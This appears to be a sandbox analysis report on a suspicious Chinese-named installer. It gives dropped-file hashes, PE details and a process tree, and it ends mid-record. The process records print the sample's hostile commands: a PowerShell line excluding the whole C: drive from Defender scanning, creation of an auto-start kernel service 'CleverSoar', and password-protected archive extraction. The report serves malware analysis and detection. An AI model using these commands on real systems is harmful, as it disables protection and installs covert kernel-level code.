                                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3598848
                                      Entropy (8bit):7.004949099807939
                                      Encrypted:false
                                      SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                      MD5:1D1464C73252978A58AC925ECE57F0FB
                                      SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                      SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                      SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 11%
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):6144
                                      Entropy (8bit):4.720366600008286
                                      Encrypted:false
                                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3598848
                                      Entropy (8bit):7.004949099807939
                                      Encrypted:false
                                      SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                      MD5:1D1464C73252978A58AC925ECE57F0FB
                                      SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                      SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                      SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 11%
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3366912
                                      Entropy (8bit):6.530548291878271
                                      Encrypted:false
                                      SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                      MD5:9902FA6D39184B87AED7D94A037912D8
                                      SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                      SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                      SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:ASCII text, with CRLF, CR line terminators
                                      Category:dropped
                                      Size (bytes):406
                                      Entropy (8bit):5.117520345541057
                                      Encrypted:false
                                      SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                      MD5:9200058492BCA8F9D88B4877F842C148
                                      SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                      SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                      SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                      Malicious:false
                                      Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.921353110353784
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 98.04%
                                      • Inno Setup installer (109748/4) 1.08%
                                      • InstallShield setup (43055/19) 0.42%
                                      • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                      File name:#U5b89#U88c5#U52a9#U624b_2.0.6.exe
                                      File size:5'707'631 bytes
                                      MD5:2fab10855efc0dc62a255ff1e6ec8fa6
                                      SHA1:0d69a4ea968d50370ee5f7d6e78252f5f61b75f5
                                      SHA256:869de4431ad5ea6b7513c3e12ff32ecd8b0e93e33c5ab6e3de7bf90de55edc23
                                      SHA512:112518d48c5b17c5e03506eb2c59aad5c102f8d709d35310a3078ff0c7181a6fe84cf0c54346c106055d7acea7471d5d160b37ecb2f39c0c9ac385c89cf36f18
                                      SSDEEP:98304:XwREyjp8ySvB0Hrd/9gpyh9PwHgtNnlQcJ3hoSBBAy6rpS7eeBacyCUmdMwZgf:lyjBSZs/Sa9PwHgtXQc9hoSBBAPpCee8
                                      TLSH:53461213F2CBD03EF05E0B3B15B2A54494FBAA25A922BD5786ECB4ECCE650501D3E647
                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                      Icon Hash:0c0c2d33ceec80aa
                                      Entrypoint:0x4a83bc
                                      Entrypoint Section:.itext
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:1
                                      File Version Major:6
                                      File Version Minor:1
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:1
                                      Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                      Instruction
                                      push ebp
                                      mov ebp, esp
                                      add esp, FFFFFFA4h
                                      push ebx
                                      push esi
                                      push edi
                                      xor eax, eax
                                      mov dword ptr [ebp-3Ch], eax
                                      mov dword ptr [ebp-40h], eax
                                      mov dword ptr [ebp-5Ch], eax
                                      mov dword ptr [ebp-30h], eax
                                      mov dword ptr [ebp-38h], eax
                                      mov dword ptr [ebp-34h], eax
                                      mov dword ptr [ebp-2Ch], eax
                                      mov dword ptr [ebp-28h], eax
                                      mov dword ptr [ebp-14h], eax
                                      mov eax, 004A2EBCh
                                      call 00007FD8E0D76955h
                                      xor eax, eax
                                      push ebp
                                      push 004A8AC1h
                                      push dword ptr fs:[eax]
                                      mov dword ptr fs:[eax], esp
                                      xor edx, edx
                                      push ebp
                                      push 004A8A7Bh
                                      push dword ptr fs:[edx]
                                      mov dword ptr fs:[edx], esp
                                      mov eax, dword ptr [004B0634h]
                                      call 00007FD8E0E082DBh
                                      call 00007FD8E0E07E2Eh
                                      lea edx, dword ptr [ebp-14h]
                                      xor eax, eax
                                      call 00007FD8E0E02B08h
                                      mov edx, dword ptr [ebp-14h]
                                      mov eax, 004B41F4h
                                      call 00007FD8E0D70A03h
                                      push 00000002h
                                      push 00000000h
                                      push 00000001h
                                      mov ecx, dword ptr [004B41F4h]
                                      mov dl, 01h
                                      mov eax, dword ptr [0049CD14h]
                                      call 00007FD8E0E03E33h
                                      mov dword ptr [004B41F8h], eax
                                      xor edx, edx
                                      push ebp
                                      push 004A8A27h
                                      push dword ptr fs:[edx]
                                      mov dword ptr fs:[edx], esp
                                      call 00007FD8E0E08363h
                                      mov dword ptr [004B4200h], eax
                                      mov eax, dword ptr [004B4200h]
                                      cmp dword ptr [eax+0Ch], 01h
                                      jne 00007FD8E0E0F04Ah
                                      mov eax, dword ptr [004B4200h]
                                      mov edx, 00000028h
                                      call 00007FD8E0E04728h
                                      mov edx, dword ptr [004B4200h]
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      .rsrc0xcb0000x110000x110003dc30b7cf7f4e86176edbf29a64cbf74False0.18785903033088236data3.7212234726717934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                                      RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                                      RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                                      RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                                      RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                                      RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                                      RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                                      RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                                      RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                                      RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                                      RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                                      RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                                      RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                                      RT_STRING0xd8e000x3f8data0.3198818897637795
                                      RT_STRING0xd91f80x2dcdata0.36475409836065575
                                      RT_STRING0xd94d40x430data0.40578358208955223
                                      RT_STRING0xd99040x44cdata0.38636363636363635
                                      RT_STRING0xd9d500x2d4data0.39226519337016574
                                      RT_STRING0xda0240xb8data0.6467391304347826
                                      RT_STRING0xda0dc0x9cdata0.6410256410256411
                                      RT_STRING0xda1780x374data0.4230769230769231
                                      RT_STRING0xda4ec0x398data0.3358695652173913
                                      RT_STRING0xda8840x368data0.3795871559633027
                                      RT_STRING0xdabec0x2a4data0.4275147928994083
                                      RT_RCDATA0xdae900x10data1.5
                                      RT_RCDATA0xdaea00x310data0.6173469387755102
                                      RT_RCDATA0xdb1b00x2cdata1.1590909090909092
                                      RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                                      RT_VERSION0xdb2980x584dataEnglishUnited States0.2804532577903683
                                      RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                                      DLLImport
                                      kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                      comctl32.dllInitCommonControls
                                      user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                      oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                      advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                      NameOrdinalAddress
                                      __dbk_fcall_wrapper20x40fc10
                                      dbkFCallWrapperAddr10x4b063c
                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States
                                      No network behavior found

                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:03:10:40
                                      Start date:23/12/2024
                                      Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe"
                                      Imagebase:0x570000
                                      File size:5'707'631 bytes
                                      MD5 hash:2FAB10855EFC0DC62A255FF1E6EC8FA6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:03:10:41
                                      Start date:23/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20420,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe"
                                      Imagebase:0xaf0000
                                      File size:3'366'912 bytes
                                      MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:3
                                      Start time:03:10:41
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                      Imagebase:0x7ff7be880000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:03:10:41
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:03:10:45
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                      Imagebase:0x7ff6ef0c0000
                                      File size:496'640 bytes
                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:6
                                      Start time:03:10:50
                                      Start date:23/12/2024
                                      Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT
                                      Imagebase:0x570000
                                      File size:5'707'631 bytes
                                      MD5 hash:2FAB10855EFC0DC62A255FF1E6EC8FA6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Reputation:low
                                      Has exited:false

                                      Target ID:7
                                      Start time:03:10:50
                                      Start date:23/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$3043C,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT
                                      Imagebase:0xd80000
                                      File size:3'366'912 bytes
                                      MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:8
                                      Start time:03:10:52
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:9
                                      Start time:03:10:52
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:10
                                      Start time:03:10:52
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:11
                                      Start time:03:10:52
                                      Start date:23/12/2024
                                      Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                      Wow64 process (32bit):true
                                      Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                      Imagebase:0x560000
                                      File size:831'200 bytes
                                      MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Has exited:true

                                      Target ID:12
                                      Start time:03:10:52
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:13
                                      Start time:03:10:53
                                      Start date:23/12/2024
                                      Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                      Wow64 process (32bit):true
                                      Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                      Imagebase:0x560000
                                      File size:831'200 bytes
                                      MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:14
                                      Start time:03:10:53
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:15
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:16
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
